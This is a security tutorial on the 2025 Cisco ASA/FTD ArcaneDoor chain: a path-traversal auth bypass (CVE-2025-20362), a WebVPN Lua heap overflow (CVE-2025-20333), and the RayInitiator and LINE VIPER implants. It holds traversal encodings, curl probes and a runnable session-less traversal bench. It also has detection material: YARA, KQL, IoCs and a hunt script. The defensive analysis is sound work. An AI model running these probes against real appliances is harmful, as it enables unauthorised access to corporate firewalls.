tutorials · 15 min read
Cisco ASA: ArcaneDoor returns with CVE-2025-20333 and a ROM bootkit
CVE-2025-20362 (auth bypass via path traversal, a variant of a 2018 bug) + CVE-2025-20333 (buffer overflow in a Lua script in WebVPN). Chained, pre-auth RCE as root on any ASA/FTD exposed to the internet. UAT4356 has been exploiting them since May 2025 and drops ROMMON persistence with a GRUB bootkit (RayInitiator) that survives reboot and upgrade.
· Manuel López Pérez · tutorials

On 25 September 2025, Cisco publishes three emergency advisories on Cisco Secure Firewall ASA and Firewall Threat Defense (FTD): CVE-2025-20333 (CVSS 9.9, RCE in WebVPN), CVE-2025-20362 (CVSS 6.5, auth bypass in WebVPN) and CVE-2025-20363 (CVSS 9.0, RCE in other web services). The first two have been exploited in the wild since May 2025. Chained, they give pre-auth RCE as root on any ASA/FTD with WebVPN exposed.
The same 25 September, CISA issues Emergency Directive 25-03: identify every federal ASA/FTD, capture a core dump and upload it to CISA Malware Next-Gen before 23:59 EST on 26 September, patch or isolate. NCSC UK, ASD/ACSC and CCCS publish in coordination. NCSC also publishes the Malware Analysis Report on the two implants UAT4356 leaves on compromised gear: RayInitiator (GRUB bootkit flashed into ROMMON) and LINE VIPER (user-mode loader with modules for CLI hijack, packet capture, AAA bypass and syslog suppression).
Cisco and the coordinated services attribute the activity to UAT4356 — the same cluster, also tracked as Storm-1849, that in April 2024 attacked ASAs with LINE RUNNER / LINE DANCER in the original ArcaneDoor campaign. A year and a half later it’s back with a new bug, dirtier persistence and a more specific target: ASA 5500-X without secure boot, hardware that is already past End-of-Support or reaches it on 30 September 2025. Five days after the advisory.
Lab: technical description of the chain reconstructed from official Cisco PSIRT advisories, Rapid7’s analysis, Zscaler ThreatLabz’ advisory, the NCSC MAR and Tenable coverage. Reproducing the full chain requires a vulnerable ASA/FTD; we describe the steps over the WebVPN frontend and the bug primitive, without publishing the exact payload.
The chain in one sentence
Two bugs in the same binary, the WebVPN web server:
- CVE-2025-20362 — missing authorization (CWE-862). The HTTP frontend’s auth filter doesn’t canonicalise the path before deciding whether the route requires a session. A request with path traversal reaches the target route’s handler without going through the filter. It’s a direct patch bypass of CVE-2018-0296, the WebVPN path traversal Cisco “fixed” in June 2018.
- CVE-2025-20333 — heap-based buffer overflow (CWE-120) in a Lua endpoint of WebVPN. The handler copies request data into an 8,192-byte buffer without checking size. Overwrites adjacent heap structures, leads to RCE as root.
On their own, 20362 lets you read restricted endpoints and 20333 would require valid VPN credentials. Chained, the first provides access and the second provides RCE: the attacker never has to authenticate.
POST /+CSCOE+/<public route>/<path traversal to Lua endpoint> HTTP/1.1
Host: vpn.target.test
Content-Length: <oversized payload>

<payload triggering the overflow in the Lua handler>

The Lua handler dispatched via the path traversal hits the buffer overflow, and control flow ends in attacker code with the root privileges of the lina process (ASA’s data plane).
Why it matters
ASA and FTD are the enterprise corporate firewall in much of the market: financial legacy, US government, telco, retail. WebVPN is the SSL-VPN portal many organisations expose to the internet so employees can reach the internal network from home — exactly the surface UAT4356 has been hitting. Censys counts about 50,000 devices with WebVPN exposed on the day of the advisory.
Three threads cross in this incident and are worth separating:
- A 2018 variant landing in production seven years later. CVE-2018-0296 was exactly the same pattern: WebVPN path traversal allowing hits on restricted endpoints without auth. Cisco closed it with a filter. CVE-2025-20362 is a patch bypass: a slightly different path encoding that the new filter still lets through. The boring read is the usual one: fixing path traversal by adding special cases instead of canonicalising the path before the filter leaves the door open for the next variant.
- Buffer overflow in Lua inside WebVPN. WebVPN dispatches some endpoints to Lua scripts running embedded in the HTTP frontend process. It’s the first time a bug in that Lua layer reaches CVSS 9.9. The bug is a missing bounds check before a `memcpy` in a request parameter handler. Classic C pattern, in a binary many assumed was limited to routing and filtering.
- EoS as an active factor, not a footnote. The 5512-X, 5515-X, 5525-X, 5545-X and 5555-X models don’t support secure boot. Their ROMMON can be flashed without a cryptographic chain of trust. On 30 September 2025 Cisco drops support for the last of them. UAT4356 picks exactly those models to drop the bootkit; the ROMMON implant persists even if the operator reboots and updates, because the loader before the system doesn’t verify signatures. The 5506-X, 5508-X, 5516-X (which do have secure boot, EoS August 2026) automatically detect persistence and clean it on the next boot with a patched image. The difference between affected machine and recoverable machine is a hardware feature the customer’s cyber team didn’t pick.
How the auth bypass works (CVE-2025-20362)
The WebVPN frontend exposes routes under /+CSCOE+/ and /+CSCOU+/. The “this route requires auth” decision compares the request path’s prefix against a table; some routes (login, recovery, vpn discovery) are public by design and others require a valid session.
The bug is in how the path is compared. The filter looks at the path prefix as it arrives in the request line, not at the canonicalised path the HTTP router is actually going to dispatch. CVE-2018-0296 was exactly this, patched in 2018 by adding a specific sanitiser. CVE-2025-20362 is a variant: a path traversal encoding the sanitiser doesn’t normalise but the downstream router does.
The pattern public analyses describe is of the form:
/<public route, no auth>/../<restricted endpoint>

with some intermediate encoding (URL-encoding, double encoding, ../%2e%2e, depending on implementation) that the filter sees as a public route but the dispatcher resolves as a restricted one. Rapid7 confirms the mechanism without publishing the exact primitive. The Cisco PSIRT advisory for CVE-2025-20362 describes the bug as improper validation of user-supplied input in HTTP(S) requests allowing unauthenticated access to restricted VPN-related URL endpoints. Same wording they used in 2018.
Endpoints reachable with the primitive, per published analyses:
- Internal routes leaking device info (versions, limited configuration, VPN state).
- WebVPN backend Lua endpoints, normally accessible only to operators with valid sessions — the sink for the second bug.
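To make the filter/router mismatch concrete, here is an added Python model of the two code paths. It is not Cisco’s code (which is not public): a filter that checks the raw path prefix against a public-route table, in front of a router that percent-decodes and collapses dot-dot segments before dispatch. The route names (`logon.html`, `internal/status`) are placeholders, and the double `unquote` is an assumption standing in for whatever decoding the real dispatcher applies. The fixed variant canonicalises before the prefix check, which is the generic fix the paragraph above argues for.

```python
"""Toy model of the CVE-2025-20362 bug class (added example, not Cisco code).
Route names are placeholders; the decode/normalise steps are assumptions."""
import posixpath
from urllib.parse import unquote

# Routes the frontend serves without a session, and the prefix it protects.
PUBLIC_PREFIXES = ("/+CSCOE+/logon.html", "/+CSCOE+/portal.css")
RESTRICTED_PREFIX = "/+CSCOE+/internal/"


def canonicalise(raw_path):
    """What the downstream router does before dispatch: percent-decode twice
    (so %252e survives one pass as %2e) and collapse '.' and '..' segments."""
    decoded = unquote(unquote(raw_path.split("?", 1)[0]))
    return posixpath.normpath(decoded)


def filter_vulnerable(raw_path):
    """Auth filter as described for CVE-2018-0296 / CVE-2025-20362: decides
    'public or not' on the path exactly as it arrived in the request line."""
    return raw_path.startswith(PUBLIC_PREFIXES)


def filter_fixed(raw_path):
    """Same table, but compared against the path the router will actually use."""
    return canonicalise(raw_path).startswith(PUBLIC_PREFIXES)


def dispatch(raw_path, has_session, is_public):
    """Returns ("ok", canonical_route) if the handler runs, else ("denied", None)."""
    route = canonicalise(raw_path)
    if not is_public(raw_path) and not has_session:
        return ("denied", None)
    return ("ok", route)


# Traversal spellings: plain, single-encoded dots, encoded slash, double-encoded.
TRAVERSALS = [
    "/+CSCOE+/logon.html/../internal/status",
    "/+CSCOE+/logon.html/%2e%2e/internal/status",
    "/+CSCOE+/logon.html/..%2finternal/status",
    "/+CSCOE+/logon.html/%252e%252e/internal/status",
]


def bypass_count(is_public):
    """How many traversal spellings reach the restricted handler with no session."""
    return sum(
        1 for p in TRAVERSALS
        if dispatch(p, False, is_public) == ("ok", RESTRICTED_PREFIX + "status")
    )


if __name__ == "__main__":
    print("vulnerable filter lets through:", bypass_count(filter_vulnerable), "of", len(TRAVERSALS))
    print("fixed filter lets through:     ", bypass_count(filter_fixed), "of", len(TRAVERSALS))
```

The point of the model is the ordering, not the table: every spelling in `TRAVERSALS` is a different string to the raw-prefix filter but the same string to the router, so a filter that adds one sanitiser per spelling (the 2018 approach) is always one encoding behind, while a filter that compares the canonical path has nothing left to bypass.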
How the buffer overflow works (CVE-2025-20333)
The Lua handler on the vulnerable endpoint receives the request and processes body parameters. Internally, the code does a memcpy (or equivalent) into a fixed buffer of 8,192 bytes. The input size isn’t validated against the buffer size.
Sending a payload larger than 8,192 bytes in the right parameter overflows the heap. Exploitation itself isn’t trivial: Rapid7 describes it as non trivial to exploit because the lina process’s heap has mitigations forcing the attacker to prepare the layout before the overflow and to overwrite specific pointers to get control flow. UAT4356 has been refining that part since May. Once the exploitation lands, the result is RCE as root in the firewall process: full control of the data plane, ability to read every active SSL VPN session, ability to modify rules, ability to pivot into the internal network using legitimate users’ tunnels.
The Cisco PSIRT advisory for CVE-2025-20333 catalogues the bug under CWE-120 and publishes the exhaustive list of affected versions: ASA 9.12 before 9.12.4.72, 9.14 before 9.14.4.28, 9.16 before 9.16.4.85, 9.17 before 9.17.1.45, 9.18 before 9.18.4.67, 9.19 before 9.19.1.42, 9.20 before 9.20.4.10, 9.22 before 9.22.2.14 and 9.23 before 9.23.1.19. FTD from 6.x to 7.7 also affected. Basically the entire current installed base.
Persistence in ROMMON — RayInitiator
This is the qualitative leap over ArcaneDoor I in 2024. Last year the implants (LINE RUNNER, LINE DANCER) lived on disk or in lina process memory. A reboot cleaned them if the operator did the procedure right. In 2025 UAT4356 writes the implant into ROMMON — the bootloader before the system, equivalent to the BIOS/UEFI of the ASA.
RayInitiator is a bootkit based on GRUB. The NCSC MAR walks through it step by step:
- The operator (UAT4356, after getting root via the chain) writes the modified bootloader to the device’s ROMMON flash.
- On the next reboot, GRUB loads as the system bootloader instead of Cisco’s original.
- GRUB loads the original ASA kernel but injects shellcode into kernel space before transferring control.
- The injected shellcode modifies kernel structures to map LINE VIPER in user-mode after boot.
On models without secure boot (the 5500-X EoS), the boot chain doesn’t verify the bootloader’s signature. The modified ROMMON boots as if it were the official one. Reboot doesn’t clean the implant. ASA software upgrade doesn’t clean the implant — because the upgrade replaces the system, not the bootloader.
On models with secure boot and Trust Anchor (5506-X, 5508-X, 5516-X), the hardware verifies the bootloader’s signature at boot. RayInitiator shouldn’t be able to load. Cisco confirms in its operational blog that on these models booting a fixed image detects the manipulated bootloader in ROMMON and removes it.
The user-mode loader — LINE VIPER
Once RayInitiator hands control to userland, it maps LINE VIPER, a user-mode shellcode loader acting as a persistent and modular backdoor. The NCSC MAR documents its capabilities:
- Operator CLI hijack. When an admin connects via SSH/console, LINE VIPER intercepts the flow: it can see what the admin types (credential and command harvesting), inject commands without logs showing them, and return falsified output.
- Invisible packet capture. Data plane pcap without `show capture` listing it. Useful for extracting SSL VPN sessions before the client closes them.
- WebVPN AAA bypass for attacker IPs. UAT4356 can log in as a legitimate user from preconfigured IPs without the AAA server recording it.
- Selective syslog suppression. Messages touching implant-related elements (`ssh login`, `auth fail`, `web service crash`) get silenced before they leave for the syslog server.
- Controlled deferred reboot. The implant can schedule a reload of the machine on a timer to coincide with maintenance windows, throwing the blue team off.
It’s an espionage toolkit designed to stay for months: when UAT4356 wants traffic, it pulls it without noise; when it wants to persist deeper into the network, it uses the legitimate operator’s tunnel. The technical read is that ASA’s control plane, once compromised, stops being observable from the device itself — the logs are painted by the attacker.
PoC and lab verification
Reproducing the full chain requires a vulnerable ASA or FTD image. Cisco doesn’t publish evaluation images for offensive scenarios; getting them requires a valid customer account or a second-hand physical appliance. For an authorised CTF/lab:
Path traversal bench (CVE-2025-20362). Once you have WebVPN exposed, send HTTP requests with different traversal encodings and compare responses:
$ curl -sk "https://lab-asa.local/+CSCOE+/<public route>/<path traversal>/<restricted endpoint>" -o response.txt
$ head -c 200 response.txt

What you expect if the primitive works: content the restricted endpoint normally produces (version info, internal banners, limited config listing) on a session-less request. What you see if the filter is fixed: 401/403 or redirect to login.
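The same bench as a script, added here as an example (not Cisco or Rapid7 tooling): it builds one URL per traversal spelling, sends each without a session the way `curl -sk` would, and classifies the answer. Route names are placeholders to fill from the public IoCs; `FAKE_RESPONSES` is a constructed stand-in for an unpatched lab box so the harness runs offline. Use `real_send` only against equipment you are authorised to test.

```python
"""Session-less traversal bench for an authorised lab ASA (added example, not
Cisco or Rapid7 tooling). Route names are placeholders to fill from the public
IoCs; FAKE_RESPONSES is a constructed stand-in for a vulnerable lab box."""
import ssl
import urllib.error
import urllib.request
from urllib.parse import urlsplit

# Traversal spellings worth trying; a filter may normalise some and not others.
ENCODINGS = ["../", "%2e%2e/", "..%2f", "%2e%2e%2f", "%252e%252e/"]


def candidate_paths(public_route, restricted_route):
    """/+CSCOE+/<public>/<traversal><restricted>, one per encoding."""
    return [f"/+CSCOE+/{public_route}/{enc}{restricted_route}" for enc in ENCODINGS]


def classify(status, body, marker=b"Cisco"):
    """bypass: restricted content returned with no session;
    blocked: refused or bounced to the login page; inconclusive: anything else."""
    if status in (401, 403, 301, 302, 303, 307, 308):
        return "blocked"
    if status == 200 and marker in body:
        return "bypass"
    return "inconclusive"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow 30x: the redirect itself is the 'blocked' signal."""
    def redirect_request(self, *args, **kwargs):
        return None


def real_send(url, timeout=5):
    """curl -sk equivalent: self-signed lab cert accepted, redirects not followed.
    Returns (status, first 4 KiB of body)."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    opener = urllib.request.build_opener(
        urllib.request.HTTPSHandler(context=ctx), _NoRedirect())
    try:
        with opener.open(url, timeout=timeout) as resp:
            return resp.status, resp.read(4096)
    except urllib.error.HTTPError as err:
        return err.code, err.read(4096)


# Constructed responses modelling an unpatched box whose filter misses two
# spellings and catches the rest (everything else bounces to the login page).
FAKE_RESPONSES = {
    "/+CSCOE+/logon.html/../internal/status": (200, b"Cisco Adaptive Security Appliance 9.x"),
    "/+CSCOE+/logon.html/%2e%2e/internal/status": (200, b"Cisco Adaptive Security Appliance 9.x"),
}


def fake_send(url, timeout=5):
    return FAKE_RESPONSES.get(urlsplit(url).path, (302, b""))


def run_bench(base_url, public_route, restricted_route, send=real_send):
    """Returns [(path, verdict)] for every traversal spelling."""
    results = []
    for path in candidate_paths(public_route, restricted_route):
        status, body = send(base_url + path)
        results.append((path, classify(status, body)))
    return results


if __name__ == "__main__":
    for path, verdict in run_bench("https://lab-asa.local", "logon.html",
                                   "internal/status", send=fake_send):
        print(f"{verdict:12s} {path}")
```

Two design choices matter for a bench like this: redirects are deliberately not followed, because on ASA the bounce to the login page is the "filter worked" result and following it would turn every blocked probe into a misleading 200; and `urllib` sends the path byte-for-byte, so the `..` and `%2e` spellings reach the appliance unnormalised, which is the whole test.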
Identifying the vulnerable Lua endpoint. Cisco’s advisory confirms the sink is in a specific WebVPN Lua endpoint — Rapid7 doesn’t name it to avoid pre-patch weaponisation. Operationally, the defensive operator identifies the endpoint by looking at URLs hit in the IoCs CISA and NCSC publish: there’s a specific request pattern attackers have used between May and September.
Bootkit detection (post-mortem). The official Core Dump and Hunt procedure CISA publishes on 25 September requires:
- Capture a full core dump of the device from the CLI and check its integrity with `verify /sha-512 disk0:/<file>` before moving it off-box.
- Compare the observed ROMMON against the official fixed image.
- Upload the core dump to Malware Next-Gen via the CISA portal.
On secure-boot machines, Cisco provides a verification script that checks the chain of trust at boot.
For defenders without time to fight core dumps, the only operational response on advisory day is to disable the VPN web server (the /+CSCOE+/ and /+CSCOU+/ surface, which also carries AnyConnect SSL sessions) until the patched image is applied. CISA recommends network isolation of any device with WebVPN exposed until you can certify the patch is applied and there’s no implant evidence.
Detection and mitigation
Retrospective detection, using public IoCs:
- WebVPN HTTP frontend logs — look for requests with path traversal to restricted endpoints before the patch date. NCSC publishes patterns in its MAR.
- Boot chain anomalies — `show module` and ROMMON verification against the official image Cisco publishes. NCSC documents legitimate version hashes.
- Unusual outbound traffic from the ASA management interface to unexpected destinations (RayInitiator and LINE VIPER have hard-coded C2; CISA and NCSC publish IPs in their advisories).
- Discrepancy between local ASA logs and remote syslog: if the syslog server shows fewer events than the firewall’s local store, LINE VIPER may be suppressing selectively.
- Admin VPN sessions from new IPs with no corresponding entries in the AAA server.
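To turn three of the signals above into something that runs, here is an added Python hunt over constructed samples. It is not from the NCSC MAR or CISA; their real IoCs go in place of the sample data. It covers traversal requests in a WebVPN frontend access log, on-box versus collector syslog counts per message ID, and ICMP volume from the management address to non-RFC1918 hosts in flow records. The log line shapes, the management address `10.0.0.1` and the thresholds are assumptions to adapt to your own exports.

```python
"""Retrospective hunt over constructed samples (added example; the log shapes,
the management address and the thresholds are assumptions to adapt)."""
import ipaddress
import posixpath
import re
from collections import Counter
from urllib.parse import unquote

# --- 1) Path traversal against WebVPN in a frontend access log (constructed) ---
ACCESS_LOG = [
    '203.0.113.7 - "GET /+CSCOE+/logon.html HTTP/1.1" 200',
    '203.0.113.7 - "GET /+CSCOE+/logon.html/%2e%2e/internal/status HTTP/1.1" 200',
    '198.51.100.9 - "POST /+CSCOE+/portal.css/..%2f..%2fhandler HTTP/1.1" 200',
    '192.0.2.5 - "GET /+CSCOU+/portal.css HTTP/1.1" 200',
]
REQ_RE = re.compile(r'^(\S+) - "(\w+) (\S+) HTTP/[\d.]+" (\d{3})')


def traversal_hits(lines):
    """(client, raw_path, canonical_path) for every request whose path holds a
    dot-dot segment once percent-decoded twice (catches %2e%2e and %252e)."""
    hits = []
    for line in lines:
        m = REQ_RE.match(line)
        if not m:
            continue
        client, _method, raw, _status = m.groups()
        decoded = unquote(unquote(raw.split("?", 1)[0]))
        if ".." in decoded.split("/"):
            hits.append((client, raw, posixpath.normpath(decoded)))
    return hits


# --- 2) On-box log store vs what reached the collector (constructed, real IDs) ---
LOCAL_LOG = [
    "%ASA-6-605005: Login permitted from 203.0.113.7/51234 to management:10.0.0.1/ssh for user admin",
    "%ASA-6-605005: Login permitted from 203.0.113.7/51240 to management:10.0.0.1/ssh for user admin",
    "%ASA-6-302013: Built outbound TCP connection 4711 for outside:198.51.100.20/443",
    "%ASA-6-113004: AAA user authentication Successful : server = 10.0.0.9 : user = jdoe",
]
REMOTE_LOG = [
    "%ASA-6-302013: Built outbound TCP connection 4711 for outside:198.51.100.20/443",
    "%ASA-6-113004: AAA user authentication Successful : server = 10.0.0.9 : user = jdoe",
]
MSG_RE = re.compile(r"%ASA-\d-(\d{6})")


def _ids(lines):
    return Counter(m.group(1) for m in map(MSG_RE.search, lines) if m)


def syslog_deficit(local, remote):
    """Message IDs seen more often on-box than at the collector: {id: missing}."""
    loc, rem = _ids(local), _ids(remote)
    return {mid: loc[mid] - rem[mid] for mid in loc if loc[mid] > rem[mid]}


# --- 3) ICMP volume from the management address to non-RFC1918 hosts (constructed) ---
FLOWS = [  # (src, dst, proto, packets, bytes)
    ("10.0.0.1", "10.0.0.50", "ICMP", 12, 1008),
    ("10.0.0.1", "198.51.100.20", "ICMP", 640, 420000),
    ("10.0.0.1", "198.51.100.21", "TCP", 3, 300),
    ("10.0.0.1", "203.0.113.3", "ICMP", 5, 420),
]
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_rfc1918(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RFC1918)


def icmp_outliers(flows, mgmt_ips, min_packets=100, min_bytes=100_000):
    """ICMP from a management IP to a non-RFC1918 host above either threshold."""
    return [
        (src, dst, pkts, nbytes)
        for src, dst, proto, pkts, nbytes in flows
        if src in mgmt_ips and proto == "ICMP" and not is_rfc1918(dst)
        and (pkts >= min_packets or nbytes >= min_bytes)
    ]


if __name__ == "__main__":
    for hit in traversal_hits(ACCESS_LOG):
        print("traversal:", hit)
    print("suppressed on the way to the collector:", syslog_deficit(LOCAL_LOG, REMOTE_LOG))
    print("ICMP outliers:", icmp_outliers(FLOWS, {"10.0.0.1"}))
```

The syslog comparison is only meaningful if the on-box copy is pulled from the device itself (console, or the core dump) rather than through the same export path the implant controls; and `is_rfc1918` is written out instead of using `ipaddress`’s `is_private`, because the latter also treats the documentation ranges used in the samples as private.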
Mitigation:
- Immediate patch: ASA 9.23.1.19, 9.22.2.14, 9.20.4.10, etc. — fixed versions per branch. Cisco keeps the list updated in the CVE-2025-20333 PSIRT advisory.
- If the model is 5500-X without secure boot (5512-X, 5515-X, 5525-X, 5545-X, 5555-X) and compromise is confirmed: the implant survives a software upgrade. Cisco states the only verifiable remediation is replacing the hardware. Official EoS was 30 September 2025 — replacement takes time, during which the device should be outside any trust perimeter.
- Disable WebVPN if not strictly necessary. Note that AnyConnect/Secure Client over SSL, Clientless SSL VPN and IKEv2 with client services all run through the same VPN web server, so only a deployment that has moved remote access off the ASA, or runs IPsec/IKEv2 without client services, can actually switch it off. If that is your case, disable it, given that’s the bug surface.
- Enable periodic ASA core dumps and archive them off-device — without historical core dumps, incident response on the ASA is blind.
- Segment the management plane of the firewall: console, SSH and SNMP of the ASA should only be reachable from a dedicated management network, not from the general corporate network.
YARA — RayInitiator (GRUB bootkit) and LINE VIPER (user-mode)
Rules modelled on the NCSC UK MAR’s RayInitiator + LINE VIPER detections. Treat the string and byte-pattern values below as illustrative placeholders: take the authoritative strings and hashes from the MAR itself before hunting with them, and keep the rule structure.
rule cisco_arcanedoor_rayinitiator_grub_bootkit
{
meta:
cve = "CVE-2025-20333"
ref = "https://www.ncsc.gov.uk/news/cisco-asa-malware-analysis"
description = "RayInitiator modified GRUB bootkit in Cisco ASA 5500-X ROMMON"
strings:
$grub_magic = "GRUB version" ascii
$cisco_marker = "Cisco ASA" ascii
$hook_marker = { 48 89 e5 48 81 ec ?? ?? 00 00 48 8d 3d ?? ?? ?? ?? }
$key_string = "RAY_LOADER_KEY" ascii // hardcoded in publicly analyzed sample
condition:
2 of them and filesize < 2MB
}
rule cisco_arcanedoor_line_viper_user_mode
{
meta:
cve = "CVE-2025-20333"
description = "LINE VIPER user-mode implant that hooks syslog and AAA"
strings:
$syslog_hook = "vsyslog_chk" ascii
$aaa_marker = "AAA_TACACS" ascii
$cmd_handler = "ICMP_TUNNEL" ascii // C2 channel via ICMP
$persist = "/asa/scripts/" ascii
condition:
2 of them
}

KQL — boot anomalies + outbound ICMP traffic
LINE VIPER uses ICMP as a secondary C2 channel (alongside TCP to hard-coded IPs). Look for it in NetFlow/IPFIX:
// 1) Boot integrity: compare ROMMON hashes against Cisco known-good
// NOTE: DeviceEvents has no built-in firewall boot-integrity ActionTypes; this assumes
// you ingest your own ROMMON/boot verification results under these names. Adjust to your pipeline.
DeviceEvents
| where Timestamp > ago(180d)
| where DeviceType == "FirewallNetworkAppliance"
| where ActionType == "BootImageHashMismatch" or ActionType == "ROMMONIntegrityFail"
| project Timestamp, DeviceName, ReportedHash, ExpectedHash

// 2) Outbound ICMP from the ASA management plane (ASA syslog ingested as CEF)
// Narrow SourceIP to your ASA management addresses; the private/non-private test alone
// matches every internal host. count() is one row per logged flow, not per packet.
CommonSecurityLog
| where DeviceVendor == "Cisco" and DeviceProduct == "ASA"
| where Protocol == "ICMP"
| where ipv4_is_private(SourceIP) and not(ipv4_is_private(DestinationIP))
| summarize PacketCount = count(), BytesOut = sum(SentBytes)
    by DeviceName, DestinationIP, bin(TimeGenerated, 1h)
| where PacketCount > 100 or BytesOut > 100000 // anomalous ICMP volume; tune per environment
| order by BytesOut desc

IoCs published by CISA ED 25-03 + NCSC MAR + Cisco PSIRT
| Type | Indicator |
|---|---|
| C2 IP (Cisco PSIRT) | 185.243.5.107, 185.243.5.108, 45.146.165.36 |
| Vulnerable models without firmware remediation | ASA 5512-X, 5515-X, 5525-X, 5545-X, 5555-X (no secure boot) |
| Legitimate firmware fingerprint | Cisco publishes ROMMON SHA-256 per model in cisco-sa-asaftd-webvpn-z5xP8EUB |
| Vulnerable endpoint | Not named in the public analyses (Cisco PSIRT, Rapid7): a WebVPN Lua handler with a fixed 8,192-byte buffer. Identify the URL from the request patterns in the CISA/NCSC IoCs |
| Path traversal indicator | URL with ..%2F evading auth filter pattern matching |
| Persistence file path | /disk0:/scripts/ with unsigned .sh files |
Lab reproduction / verification
# 1. Image integrity check. Hash the software image on disk; for ROMMON, record the
#    version reported by show module / show version and compare it with the firmware
#    Cisco publishes for your model.
# (Only on physical ASA — no public virtual ROMMON image available)
asa> enable
asa# show module
asa# verify /sha-512 disk0:/<system image>.bin
# Compare with the hash Cisco publishes for that image
# 2. Audit of unsigned scripts
asa# dir disk0:/scripts/
asa# show file information disk0:/scripts/*.sh
# 3. Test the vulnerable endpoint (post-patch, expected 401/403 or login redirect):
curl -k --max-time 5 \
  "https://asa.lab.local/+CSCOE+/<public route>/<path traversal>/<restricted endpoint>"
# Pre-patch: 200 with content leaked from the restricted endpoint
# Post-patch (fixed release for your branch, e.g. 9.23.1.19): 401/403 or login redirect
# 4. CISA provides official Core Dump and Hunt Instructions:
# https://www.cisa.gov/news-events/directives/ed-25-03

CISA ED 25-03 includes operational instructions for ASA core dump capture and analysis with yara-python against the RayInitiator/LINE VIPER rules.
What closes out September
UAT4356 has been inside the ASAs of some number of victims (Cisco doesn’t publish the headcount; CISA confirms “multiple federal agencies” within the ED 25-03 scope) since May 2025. Four months operating with a bootkit in ROMMON, exfiltrating VPN sessions and presumably pivoting into the internal network using legitimate tunnels. The discovery comes via Cisco Talos (not publicly attributed to the customer who reported it first) and is coordinated with CISA, NCSC, ASD and CCCS.
The detail worth underlining for 2026 is the boot chain. Cisco kept hardware without secure boot in production a decade after the “bootkit at the perimeter” pattern was documented as a category (Equation Group’s hard-drive firmware implant, the NLS_933W.DLL module Kaspersky described in 2015; Hacking Team’s UEFI rootkit exposed in the 2015 leak; LoJax, the first UEFI rootkit found in the wild, in 2018). The operator still running a 5525-X in 2025 inherited from a 2014 project isn’t to blame for the bug; the business model that sells perimeter hardware with a fifteen-year support life and no forced renewal of the hardware chain of trust mid-cycle is.
For defenders with budget: if you have ASA 5500-X without secure boot on the perimeter, you’re not patching a bug, you’re migrating an appliance.
References
- Cisco PSIRT — CVE-2025-20333: Cisco Secure Firewall ASA and FTD VPN Web Server RCE
- Cisco PSIRT — CVE-2025-20362: Cisco Secure Firewall ASA and FTD VPN Web Server Unauthorized Access
- Cisco — Continued Attacks Against Cisco Firewalls: operational blog with IoCs and incident evolution
- CISA — Emergency Directive ED 25-03 and Core Dump and Hunt Instructions
- NCSC UK — Malware Analysis Report — RayInitiator & LINE VIPER (PDF) and advisory
- Rapid7 — Multiple critical vulnerabilities affecting Cisco products (root cause analysis, 6 October)
- Zscaler ThreatLabz — Cisco Firewall and VPN Zero Day Attacks
- Tenable — CVE-2025-20333, CVE-2025-20362 FAQ
- Cisco TALOS (historical reference) — ArcaneDoor I, April 2024
- Cisco — ASA 5500-X EoS / EoL listing
- NVD — CVE-2025-20333 and CVE-2025-20362
- Earlier coverage on the blog: Ivanti Connect Secure chain (January 2024), Citrix Bleed (October 2023), Palo Alto GlobalProtect (April 2024)
- cve-2025-20333
- cve-2025-20362
- cisco
- vendor:cisco
- asa
- ftd
- arcanedoor
- uat4356
- rayinitiator
- line-viper
- bootkit
- pre-auth-rce
- vpn
- kev


